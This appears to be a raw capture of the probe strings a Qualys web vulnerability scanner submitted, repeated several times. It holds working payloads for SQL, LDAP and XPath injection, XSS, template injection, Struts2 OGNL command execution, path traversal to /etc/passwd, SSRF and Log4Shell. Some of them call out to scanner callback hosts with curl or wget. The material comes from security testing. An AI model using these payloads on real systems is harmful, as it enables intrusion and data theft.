http://79c8f4726274f2e255fd3fb961bebfd244013cba.17280807393642422.199608412.ssrf01.ssrf.eu2.qualysperiscope.com.
Joe+ bcc:was_engine@5f2c1e1060d41535f38d36a1baba3eacdb2b18a6.17280807393642422.3032612523.smtphi01.smtp.eu2.qualysperiscope.com.
1
1
1)(|(uidNumber=*)
1
1)(|(gidNumber=*)
1
1)(|(homeDirectory=*)
1
1)(|(uid=*)
1
1)(|(objectclass=*)
1
1*
1
1)(|(cn=*))
1
1*(|(objectclass=*))
1
1)(uid=*))(|(uid=*
1
1)(attribute2=*)
1
QualysWAS${150797*150797}QualysWAS
1
${''.getClass().forName('java.lang.Runtime').getMethods()[6].toString()}
1
QualysWAS${"150898".toString().replace("8", "7")}QualysWAS
1
https://community.qualys.com/
1
http://169.254.169.254/latest/meta-data/
1
function(){qxss6ziR5EV5};
1
qualyswas:
1
(23.0231*213.759)
1
;echo 23.0231*213.759;//{@math key=4335.158242899999 method="add" operand=586.23659/} /* #set($value=23.0231*213.759) $value */
1
1
|aaaa =(23.0231*213.759) |${23.0231*213.759}{23.0231*213.759}4921.3948329(23.0231*213.7591)=(23.0231*213.759)#{23.0231*213.759}
1
!@#$%^&*()
1
!@#$%^&*()1
1
1!@#$%^&*()
1
1
1
"-qxssoIP13V3R()-"
1
'-qxss7t80aB0A()-'
1
*/;(function(){qxss635AqSjl});/*
1
9 ;(function(){qxss4MGG14XZ});//
1
9;(function(){qxssJeq6c78g});//
1
';(function(){qxssHi12SO7H});/**/'
1
qualys(aqxsslbK4k88C)xyz
1
");(function(){qxssQMZvn52o});/**/"
1
";(function(){qxssyp1l5XJ8});/**/"
1
javascript:qxss(X177072932Y1_2Z);
1
http://rfitest/
1
|netstat -an
1
a(){}phpinfo(); function a
1
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q2d1hi3j').(#str3='B4D7e6').(#str=#str2+':QQ:'+#str1+':PP:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}
1
%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q9d4hi5j').(#str3='R9D7e8').(#str=#str2+':QQ:'+#str1+':TT:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q9d4hi5j').(#str3='R9D7e8').(#str=#str2+':QQ:'+#str1+':TT:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
1
1
....//....//....//....//....//....//etc/passwd
1
php://filter/read=string.rot13/resource=/etc/passwd
../../../../../../../Windows/System32/drivers/etc/hosts
1
1
../../../../../../../Windows/System32/drivers/etc/hosts
1
//....//....//....//....//....//....//....//etc/passwd
//..//..//..//..//..//..//..//etc/passwd
1
1
../../../../../../../etc/passwd
1
/../../../../../../../etc/passwd
1
/../../../../../../../etc/passwd
1
1
1e309
1
(
1
,
1
``
1
/*
1
#
1
;--
1
1'
1
qualyswasesi
1
q Qualys_resp_hdr_injection: Vulnerable
1
q Qualys_resp_hdr_injection: Vulnerable
1
q Content-Type:text/html Content-Length: 190 HTTP/1.1 200 OK Content-Type: text/html Set-Cookie: a=q Content-Length: 2 AA
1
111222
1
1
1
%3cscript z%3e_q(y)%3c/script%3e
1
< script a=4>qss8n50xVOs=7< /script>
1
" onEvent=X177072932Y1_2Z
1
' onEvent=X177072932Y1_2Z
1
"'>
1
1
BODY{background:url("javascript:qss48o8DUZM=7")}
1
1">
1
1
1
"'>
1
1
1
1
1 _q_q=random(FXGZIb06)
1
_q=random(X177072932Y1_2Z)
1
_q=random(X177072932Y1_2Z)
1
"'>
1
z-->
1
1"'>
">
1
1
javascript:qxss(X177072932Y1_2Z);
1
" onEvent=X177072932Y1_2Z
1
' onEvent=X177072932Y1_2Z
1
_q=random(X177072932Y1_2Z)
1
"'>
1
1
1(#context["xwork.MethodAccessor.denyMethodExecution"]= new java.lang.Boolean(false), #_memberAccess["allowStaticMethodAccess"]= new java.lang.Boolean(true), @java.lang.Thread@sleep(28*1000))
1
require('child_process').execSync('sleep 29').toString()
1
__import__('os').popen('sleep 29').read()
1
1' + sleep(29*100*Math.sqrt(100)) + '
1
1'; var djci=sleep(29*1000) + '
1
1'; var djci=sleep(29*1000);//
1
1' OR (SELECT 1337 FROM (SELECT(SLEEP(29)))prime) AND 'qualys'='qualys
1' WHERE 1337=1337 AND (SELECT 1319 FROM (SELECT(SLEEP(29)))qualys)-- prime
1
1
1(SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333) /*'XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); -- OR'|"XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); -- OR"*/
1
1;SELECT sleep(29); --
1
1' + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_2222) + '
1
1 + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_1111)
1
1',0,0);WAITFOR DELAY'00:00:29'--
1
1');WAITFOR DELAY '00:00:29'--
1
1';WAITFOR DELAY '00:00:29'--
1
1);WAITFOR DELAY '00:00:29'--
1
1;WAITFOR DELAY '00:00:29';
1
1WAITFOR DELAY '00:00:29'
1
|ping -c2 -i91 localhost|
1
|ping -c2 -i56 localhost
1
ping -c2 -i91 localhost
1
aaaa&ping -n 92 localhost&
1
1
1
1
1" or not(false()) or "true" = "true
1
1" and false() and "or" = "and
1
1" or true() or "and" = "and
1 or not(false()) or 'true' = 'true'
1
1
1 and false() and 'or' = 'and'
1
1 or true() or 'and' = 'and'
1
1' or not(false()) or 'true' = 'true
1
1' and false() and 'or' = 'and
1
1' or true() or 'and' = 'and
1
15 oR 9=8 + 1
1
11 or 11=12
1
11 or 11=11
1' /* or __Q_1__ */oR ' aND xqlkp'=' aND xqlkp
1
1
1' and 'tpklq'='xqlkp
1
1' or 'tpklq'='tpklq
1
1') /* or __Q_1__ */oR ' aND ptqws'=' aND ptqws
1') and 'swqtp'='ptqws
1
1
1') or 'swqtp'='swqtp
1 aND 7248=2491 + 4757
1
1 and 7248 IS NULL
1
1
1 and NULL IS NULL
1
1 oR 6248=2491 + 3757
1
1 or 6248 IS NULL
1
1 or NULL IS NULL
1
1 /* or __Q_1__ */oR 4325=1597 + 2728 -- aND 2729
1
1 and 4325=2728 --
1
1 or 4325=4325 --
1
1' /* or __Q_1__ */oR 3789=2398 + 1391 -- aND 1390
1
1' and 3789=1391 --
1
1' or 3789=3789 --
1') /* or __Q_1__ */oR 2634=1511 + 1123 -- aND 1124
1
1') and 2634=1123 --
1
1
1') or 2634=2634 --
1
1
1
file:///etc/passwd
1
1
1
http://localhost:19096
1
$..[?(p="console.log(this.process.mainModule.require('child_process').execSync('curl 74cb45636b7ca20b6cfebd4a028fdc697f120002.17253090393642422.3702448534.oscomm15279701.oscomm.eu2.qualysperiscope.com.').toString())";QualysWAS=''[['constructor']][['constructor']](p);QualysWAS())]
1
__import__('os').popen('wget 402cb346bc249022a0261f28f159ef76bb5c4fd4.17253090393642422.45281960.oscomm15214101.oscomm.eu2.qualysperiscope.com.').read()
1
__import__('os').popen('curl 5e70c010ce8ba43a6e2efe0d305578a0723e41a7.17253090393642422.573883384.oscomm15214100.oscomm.eu2.qualysperiscope.com.').read()
1
@pd.core.frame.com.builtins.__import__("os").system("""curl 3d115b788812e0704df7a3fa73edcb535a40f93c.17253090393642422.3589339110.oscomm15256401.oscomm.eu2.qualysperiscope.com.#""")
1
@pd.core.frame.com.builtins.__import__("os").system("""curl db59de4eda541df57f16ee44d6134b468a423a7a.17253090393642422.2428861734.oscomm15256400.oscomm.eu2.qualysperiscope.com.#""")
1
${"".getClass().forName("java.net.InetAddress").getMethod("getByName","".getClass()).invoke("","89deec74fb71c4eb539ef6d3834b5fe99da71e06.17253090393642422.1681369105.oscomm15079701.oscomm.eu2.qualysperiscope.com.")}
1
1
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}://64d2ca4c89aece66832ba1916b93efe9b0f8a669.17253090393642422.4227674593.log4j12.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://a4723387ad7bd8be8b77a82ea41b51c48cd96b84.17253090393642422.3701264975.log4j11.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${j${k8s:k5:-ND}i${sd:k5:-:}${lower:L}dap${sd:k5:-:}//821b442352fc7c822c29defce656780e149ee9c4.17253090393642422.1456824098.log4j10.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jndi:dns://f73178268d2280d288ab727d835266cb3461789d.17253090393642422.2036716007.log4j09.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//59e84dfba6c45877ae8b261368cf872c4a4e3468.17253090393642422.2634455058.log4j08.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jnd${123%ff:-${123%ff:-i:}}ldap://103e56e1dc2a914fe878fa35907901fe19b4e19f.17253090393642422.130604347.log4j07.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${j${::-n}di:ldap${::-:}//80f5001df2b04e9662ed1dd6e16bd549d47a89f0.17253090393642422.3892661995.log4j06.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://18d973b6d600e271cd3e068b9b4d697668db6d2d.17253090393642422.2052202859.log4j05.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://6b4fee0d920f68cf324de08fa939984cef86c169.17253090393642422.2804482787.log4j04.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jndi:rmi://cce2a4b363b02f46ef22481c6c25a0469aa6e9b3.17253090393642422.946008.log4j03.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jndi:ldap://1aeb771fc42d0709559ead49d9f6ea2d1c605ba8.17253090393642422.1438710689.log4j02.log4j.eu2.qualysperiscope.com./QualysWAS}
1
f52b944a28f504149f52da39d192f30fa1b0abc6.17253090393642422.882677903.ssrf02.ssrf.eu2.qualysperiscope.com.
1
http://3fc58c4b85c7f8d89bf5cfba58a37931b98e60f9.17253090393642422.707788315.ssrf01.ssrf.eu2.qualysperiscope.com.
1
Joe+ bcc:was_engine@4fa1c4ce2014f77345b26756422f2da9e049aa40.17253090393642422.2034434440.smtphi01.smtp.eu2.qualysperiscope.com.
1
1)(|(uidNumber=*)
1
1)(|(gidNumber=*)
1
1)(|(homeDirectory=*)
1
1)(|(uid=*)
1
1)(|(objectclass=*)
1
1*
1
1)(|(cn=*))
1
1*(|(objectclass=*))
1
1)(uid=*))(|(uid=*
1
1)(attribute2=*)
1
QualysWAS${150797*150797}QualysWAS
1
${''.getClass().forName('java.lang.Runtime').getMethods()[6].toString()}
1
QualysWAS${"150898".toString().replace("8", "7")}QualysWAS
1
https://community.qualys.com/
1
http://169.254.169.254/latest/meta-data/
1
function(){qxsseQ6t1137};
1
qualyswas:
1
(23.0231*213.759)
1
;echo 23.0231*213.759;//{@math key=4335.158242899999 method="add" operand=586.23659/} /* #set($value=23.0231*213.759) $value */
1
1
|aaaa =(23.0231*213.759) |${23.0231*213.759}{23.0231*213.759}4921.3948329(23.0231*213.7591)=(23.0231*213.759)#{23.0231*213.759}
1
!@#$%^&*()
1
!@#$%^&*()1
1
1!@#$%^&*()
1
1
1
"-qxss7iyWqgp0()-"
1
'-qxssAgKZ0fDu()-'
1
*/;(function(){qxss0xO761Hv});/*
1
9 ;(function(){qxssJ76Qwshv});//
1
9;(function(){qxssjTXViBB8});//
';(function(){qxss7zhjJ532});/**/'
1
1
qualys(aqxssHHqGc0sr)xyz
1
");(function(){qxsszc0t0A49});/**/"
1
";(function(){qxssWpEj146y});/**/"
1
javascript:qxss(X153172924Y1_2Z);
1
http://rfitest/
1
|netstat -an
1
a(){}phpinfo(); function a
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q2d1hi3j').(#str3='B4D7e6').(#str=#str2+':QQ:'+#str1+':PP:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}
1
1
%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q9d4hi5j').(#str3='R9D7e8').(#str=#str2+':QQ:'+#str1+':TT:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
1
%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q9d4hi5j').(#str3='R9D7e8').(#str=#str2+':QQ:'+#str1+':TT:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
1
....//....//....//....//....//....//etc/passwd
1
php://filter/read=string.rot13/resource=/etc/passwd
1
../../../../../../../Windows/System32/drivers/etc/hosts
1
../../../../../../../Windows/System32/drivers/etc/hosts
1
//....//....//....//....//....//....//....//etc/passwd
1
//..//..//..//..//..//..//..//etc/passwd
1
../../../../../../../etc/passwd
1
/../../../../../../../etc/passwd
1
/../../../../../../../etc/passwd
1
1
1e309
(
1
1
,
1
``
1
/*
1
#
;--
1
1
1'
1
qualyswasesi
1
q Qualys_resp_hdr_injection: Vulnerable
1
q Qualys_resp_hdr_injection: Vulnerable
1
q Content-Type:text/html Content-Length: 190 HTTP/1.1 200 OK Content-Type: text/html Set-Cookie: a=q Content-Length: 2 AA
1
111222
1
1
1
%3cscript z%3e_q(y)%3c/script%3e
1
< script a=4>qssey54IIe6=7< /script>
1
" onEvent=X153172924Y1_2Z
1
' onEvent=X153172924Y1_2Z
1
"'>
1
1
BODY{background:url("javascript:qss5pDL38GA=7")}
1
1">
1
1
1
"'>
1
1
1
1
1 _q_q=random(xyN3ln9d)
1
_q=random(X153172924Y1_2Z)
1
_q=random(X153172924Y1_2Z)
1
"'>
1
z-->
1
1"'>
1
">
1
javascript:qxss(X153172924Y1_2Z);
1
" onEvent=X153172924Y1_2Z
1
' onEvent=X153172924Y1_2Z
1
_q=random(X153172924Y1_2Z)
1
"'>
1
1
1(#context["xwork.MethodAccessor.denyMethodExecution"]= new java.lang.Boolean(false), #_memberAccess["allowStaticMethodAccess"]= new java.lang.Boolean(true), @java.lang.Thread@sleep(28*1000))
1
require('child_process').execSync('sleep 29').toString()
__import__('os').popen('sleep 29').read()
1
1
1' + sleep(29*100*Math.sqrt(100)) + '
1
1'; var djci=sleep(29*1000) + '
1
1'; var djci=sleep(29*1000);//
1
1' OR (SELECT 1337 FROM (SELECT(SLEEP(29)))prime) AND 'qualys'='qualys
1
1' WHERE 1337=1337 AND (SELECT 1319 FROM (SELECT(SLEEP(29)))qualys)-- prime
1
1(SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333) /*'XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); -- OR'|"XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); -- OR"*/
1
1;SELECT sleep(29); --
1
1' + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_2222) + '
1
1 + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_1111)
1
1',0,0);WAITFOR DELAY'00:00:29'--
1
1');WAITFOR DELAY '00:00:29'--
1
1';WAITFOR DELAY '00:00:29'--
1
1);WAITFOR DELAY '00:00:29'--
1
1;WAITFOR DELAY '00:00:29';
1
1WAITFOR DELAY '00:00:29'
1
|ping -c2 -i91 localhost|
1
|ping -c2 -i56 localhost
1
ping -c2 -i91 localhost
1
aaaa&ping -n 92 localhost&
1
1
1
1
1" or not(false()) or "true" = "true
1
1" and false() and "or" = "and
1
1" or true() or "and" = "and
1 or not(false()) or 'true' = 'true'
1
1 and false() and 'or' = 'and'
1
1 or true() or 'and' = 'and'
1
1
1' or not(false()) or 'true' = 'true
1
1' and false() and 'or' = 'and
1
1' or true() or 'and' = 'and
15 oR 9=8 + 1
1
11 or 11=12
1
1
11 or 11=11
1' /* or __Q_1__ */oR ' aND xqlkp'=' aND xqlkp
1
1' and 'tpklq'='xqlkp
1
1
1' or 'tpklq'='tpklq
1') /* or __Q_1__ */oR ' aND ptqws'=' aND ptqws
1
1') and 'swqtp'='ptqws
1
1
1') or 'swqtp'='swqtp
1
1 aND 7248=2491 + 4757
1
1 and 7248 IS NULL
1
1 and NULL IS NULL
1 oR 6248=2491 + 3757
1
1
1 or 6248 IS NULL
1
1 or NULL IS NULL
1 /* or __Q_1__ */oR 4325=1597 + 2728 -- aND 2729
1
1 and 4325=2728 --
1
1
1 or 4325=4325 --
1' /* or __Q_1__ */oR 3789=2398 + 1391 -- aND 1390
1
1' and 3789=1391 --
1
1
1' or 3789=3789 --
1') /* or __Q_1__ */oR 2634=1511 + 1123 -- aND 1124
1
1') and 2634=1123 --
1
1
1') or 2634=2634 --
1
1
1
file:///etc/passwd
1
1
1
http://localhost:19096
1
$..[?(p="console.log(this.process.mainModule.require('child_process').execSync('curl fb6ff1f769b98c925206ffd550643a82fff323f2.17220219393642422.1475675271.oscomm15279701.oscomm.eu2.qualysperiscope.com.').toString())";QualysWAS=''[['constructor']][['constructor']](p);QualysWAS())]
1
__import__('os').popen('wget f3e1e5f6b10e5d3d2beb4c9190251adea9813636.17220219393642422.3880863410.oscomm15214101.oscomm.eu2.qualysperiscope.com.').read()
1
__import__('os').popen('curl b4e7c9d3c0e35efc3e9f56a141b2dab629478fc7.17220219393642422.2831551423.oscomm15214100.oscomm.eu2.qualysperiscope.com.').read()
1
@pd.core.frame.com.builtins.__import__("os").system("""curl 47f09a256041c00708eb1c557d9b8177be3cd4e3.17220219393642422.4025694899.oscomm15256401.oscomm.eu2.qualysperiscope.com.#""")
1
@pd.core.frame.com.builtins.__import__("os").system("""curl 3b9480915794d507d85a37b5ed66c2ef2defe509.17220219393642422.19721346.oscomm15256400.oscomm.eu2.qualysperiscope.com.#""")
1
${"".getClass().forName("java.net.InetAddress").getMethod("getByName","".getClass()).invoke("","304419882394eb705c2a517b39f2614b8c7712cb.17220219393642422.1991341168.oscomm15079701.oscomm.eu2.qualysperiscope.com.")}
1
1
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}://4fb7744dbacf3a015e1ea0d1f28eed795e18f00a.17220219393642422.1848917823.log4j12.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://4e9511cc7dddc13d51b1be923f7a1893e7fba6cc.17220219393642422.960873853.log4j11.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${j${k8s:k5:-ND}i${sd:k5:-:}${lower:L}dap${sd:k5:-:}//54b16f1e9f2ebaab4bf80049f372e1a84049ea3f.17220219393642422.1456793210.log4j10.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jndi:dns://24ca600c0a25c4dda8aa6a8c341642fba02c8640.17220219393642422.1310678228.log4j09.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//450aedaf523489d574d4662ada70773cb1899945.17220219393642422.1369417745.log4j08.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jnd${123%ff:-${123%ff:-i:}}ldap://0156ce8f927eb81f8211055a7fd039a014b4b2c0.17220219393642422.2795162050.log4j07.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${j${::-n}di:ldap${::-:}//a6ff0ae1b79356e710733bb8fa4a9ef6efe59ae7.17220219393642422.1907516193.log4j06.log4j.eu2.qualysperiscope.com./QualysWAS}
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://13c05bbfacbb9a0efa0bc62f5e1488bf480f490a.17220219393642422.2246556773.log4j05.log4j.eu2.qualysperiscope.com./QualysWAS}
1
1
${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://6683f70097a5c6f9ad8aba97f77fcfee735ff442.17220219393642422.1939588117.log4j04.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jndi:rmi://0f1c0c0d0f09b04f2d70ca9069b185479f28e618.17220219393642422.3796829973.log4j03.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jndi:ldap://5ba78968fd001b37f25183933e557a205e9cc7c2.17220219393642422.1065813791.log4j02.log4j.eu2.qualysperiscope.com./QualysWAS}
1
8e1462b2b8e604a5c5a6677be3dcc42c240a580b.17220219393642422.3705286379.ssrf02.ssrf.eu2.qualysperiscope.com.
1
http://cf29120d5f44e0d68e78e8e70691a5e31460776e.17220219393642422.2318233203.ssrf01.ssrf.eu2.qualysperiscope.com.
1
Joe+ bcc:was_engine@0c03158f370e03afc3981febaf1508cec96379eb.17220219393642422.3050470039.smtphi01.smtp.eu2.qualysperiscope.com.
1
1)(|(uidNumber=*)
1)(|(gidNumber=*)
1
1
1)(|(homeDirectory=*)
1
1)(|(uid=*)
1
1)(|(objectclass=*)
1
1*
1
1)(|(cn=*))
1
1*(|(objectclass=*))
1
1)(uid=*))(|(uid=*
1)(attribute2=*)
1
1
QualysWAS${150797*150797}QualysWAS
1
${''.getClass().forName('java.lang.Runtime').getMethods()[6].toString()}
1
QualysWAS${"150898".toString().replace("8", "7")}QualysWAS
1
https://community.qualys.com/
1
http://169.254.169.254/latest/meta-data/
1
function(){qxss4GteDYdl};
1
qualyswas:
1
(23.0231*213.759)
1
;echo 23.0231*213.759;//{@math key=4335.158242899999 method="add" operand=586.23659/} /* #set($value=23.0231*213.759) $value */
1
1
|aaaa =(23.0231*213.759) |${23.0231*213.759}{23.0231*213.759}4921.3948329(23.0231*213.7591)=(23.0231*213.759)#{23.0231*213.759}
1
!@#$%^&*()
1
!@#$%^&*()1
1
1!@#$%^&*()
1
1
1
"-qxssbZ3q75Nt()-"
1
'-qxsseF10M24Z()-'
1
*/;(function(){qxssfY0MoJGf});/*
1
9 ;(function(){qxssmw9Uvv25});//
1
9;(function(){qxss3X2x8rfF});//
1
';(function(){qxss81v0JgZ7});/**/'
1
qualys(aqxss9bmMf22s)xyz
1
");(function(){qxss85ue15Me});/**/"
1
";(function(){qxssuG0GRWo7});/**/"
1
javascript:qxss(X156889004Y1_2Z);
1
http://rfitest/
1
|netstat -an
1
a(){}phpinfo(); function a
1
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q2d1hi3j').(#str3='B4D7e6').(#str=#str2+':QQ:'+#str1+':PP:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}
1
%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q9d4hi5j').(#str3='R9D7e8').(#str=#str2+':QQ:'+#str1+':TT:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
1
%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q9d4hi5j').(#str3='R9D7e8').(#str=#str2+':QQ:'+#str1+':TT:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
1
....//....//....//....//....//....//etc/passwd
1
php://filter/read=string.rot13/resource=/etc/passwd
1
../../../../../../../Windows/System32/drivers/etc/hosts
1
../../../../../../../Windows/System32/drivers/etc/hosts
1
